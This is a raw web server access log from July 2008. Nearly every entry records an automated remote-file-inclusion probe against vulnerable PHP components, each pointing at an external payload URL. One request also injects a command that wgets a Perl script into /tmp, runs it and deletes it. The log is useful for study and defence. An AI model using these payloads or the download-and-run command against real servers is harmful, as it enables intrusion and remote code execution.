58.227.193.215 - - [06/Jul/2008:11:16:27 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.170 - - [06/Jul/2008:11:16:29 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.0" 200 25909 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
58.227.193.215 - - [06/Jul/2008:11:16:30 -0700] "GET /logs/access_080120.log/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:11:16:40 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:16:42 -0700] "GET /logs/access_080215.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:16:42 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:16:48 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [06/Jul/2008:11:16:48 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:11:16:49 -0700] "GET /logs/db.php?path_local=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:11:16:49 -0700] "GET /db.php?path_local=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:17:04 -0700] "GET /logs/access_080329.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:17:25 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:17:25 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:17:26 -0700] "GET /logs/errors.php?error=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:17:26 -0700] "GET /errors.php?error=http://h1.ripway.com/rastamania/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:17:36 -0700] "GET /logs/access_071230.log//start.php?lang=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:17:36 -0700] "GET //start.php?lang=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:17:36 -0700] "GET /logs//start.php?lang=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
201.6.118.215 - - [06/Jul/2008:11:17:48 -0700] "GET /logs/access_080329.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:18:10 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:18:11 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:18:16 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:18:16 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:18:16 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:18:17 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:18:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:18:17 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:11:18:18 -0700] "GET /logs/access_071224.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:18:20 -0700] "GET /logs/access_071224.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.17.22 - - [06/Jul/2008:11:18:28 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-learning.globalfree.net/ispo/bauu/pr0t/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.230.17.22 - - [06/Jul/2008:11:18:28 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.e-learning.globalfree.net/ispo/bauu/pr0t/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:18:30 -0700] "GET /logs//display.php?table=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:11:18:30 -0700] "GET //display.php?table=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
194.151.161.240 - - [06/Jul/2008:11:18:44 -0700] "GET /logs/access_071225.log/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.130.30 - - [06/Jul/2008:11:18:45 -0700] "GET /logs/access_080329.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://geocities.com/anang_shift/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.234.130.30 - - [06/Jul/2008:11:18:46 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://geocities.com/anang_shift/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.234.130.30 - - [06/Jul/2008:11:18:48 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://geocities.com/anang_shift/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:11:19:02 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:11:19:02 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [06/Jul/2008:11:19:16 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [06/Jul/2008:11:19:16 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.255.60.55 - - [06/Jul/2008:11:19:34 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.255.60.55 - - [06/Jul/2008:11:19:35 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.153.86.57 - - [06/Jul/2008:11:19:56 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.191.142.125 - - [06/Jul/2008:11:20:08 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:20:10 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:20:12 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:20:13 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [06/Jul/2008:11:20:14 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.19.43.99 - - [06/Jul/2008:11:20:15 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:11:20:23 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:11:20:24 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:11:20:24 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:20:33 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:20:33 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:20:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:20:33 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:11:20:36 -0700] "GET /logs/access_071224.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:21:06 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:21:07 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:21:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:11:21:15 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:11:21:16 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:21:18 -0700] "GET /logs/access_080225.log/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:21:18 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:21:36 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:21:38 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.28.69.222 - - [06/Jul/2008:11:21:51 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://beusix.net/cmd.gif?&cmd=id;wget%20www.sadeca.com/d.jpg%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;http://beusix.net/cmd.gif?&cmd=id;wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.jpg;perl%20/tmp/d.jpg;rm%20-rf%20/tmp/d.jpg HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:11:22:25 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:22:25 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:11:22:25 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:22:25 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.128.80.11 - - [06/Jul/2008:11:22:28 -0700] "GET /logs/scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.128.80.11 - - [06/Jul/2008:11:22:28 -0700] "GET /scanhttp://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:22:44 -0700] "GET /logs/access_080301.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:22:44 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:22:44 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:11:22:46 -0700] "GET /logs//display.php?table=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [06/Jul/2008:11:22:47 -0700] "GET //display.php?table=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:22:49 -0700] "GET /logs/access_080110.log/index.php?pagina1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:11:22:49 -0700] "GET /logs/access_080110.log/index.php?pagina1=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:22:57 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:22:57 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:22:57 -0700] "GET /logs/nav.php?pag=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:02 -0700] "GET /logs/nav.php?pag=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:07 -0700] "GET /nav.php?pag=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:12 -0700] "GET /nav.php?pag=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.65.79 - - [06/Jul/2008:11:23:23 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.wocken-industriebedarf.de/contenido/cronjobs/rfi-response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:23:24 -0700] "GET /logs/access_080313.log//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:30 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:35 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:23:40 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [06/Jul/2008:11:23:41 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:11:23:46 -0700] "GET /logs//display.php?table=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:46 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [06/Jul/2008:11:23:46 -0700] "GET //display.php?table=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:11:23:51 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 18387 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.15 - - [06/Jul/2008:11:23:57 -0700] "GET /logs/access_080225.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:23:58 -0700] "GET /logs/access_080329.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.22.32 - - [06/Jul/2008:11:24:28 -0700] "GET /logs/access_080330.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/cilux_kuclux/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:24:30 -0700] "GET /logs/access_080211.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.104.188.3 - - [06/Jul/2008:11:24:42 -0700] "GET /logs/access_080313.log//claroline/phpbb/page_tail.php?includePath=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:24:44 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:24:45 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.186.11.35 - - [06/Jul/2008:11:24:45 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.snatomania.altervista.org/saday%3C/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:25:17 -0700] "GET /logs//includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.208.173 - - [06/Jul/2008:11:25:18 -0700] "GET //includes?vwar_root=http://www.duvenbeck.de/contenido/logs/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:25:23 -0700] "GET /logs/access_080129.log//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:25:24 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [06/Jul/2008:11:25:25 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:25:25 -0700] "GET //appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:11:25:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [06/Jul/2008:11:25:45 -0700] "GET /logs/access_080218.log//index.php?main=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.180.39.222 - - [06/Jul/2008:11:25:48 -0700] "GET //index.php?main=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 200 18433 "-" "libwww-perl/5.805" "www.dmulk.com"
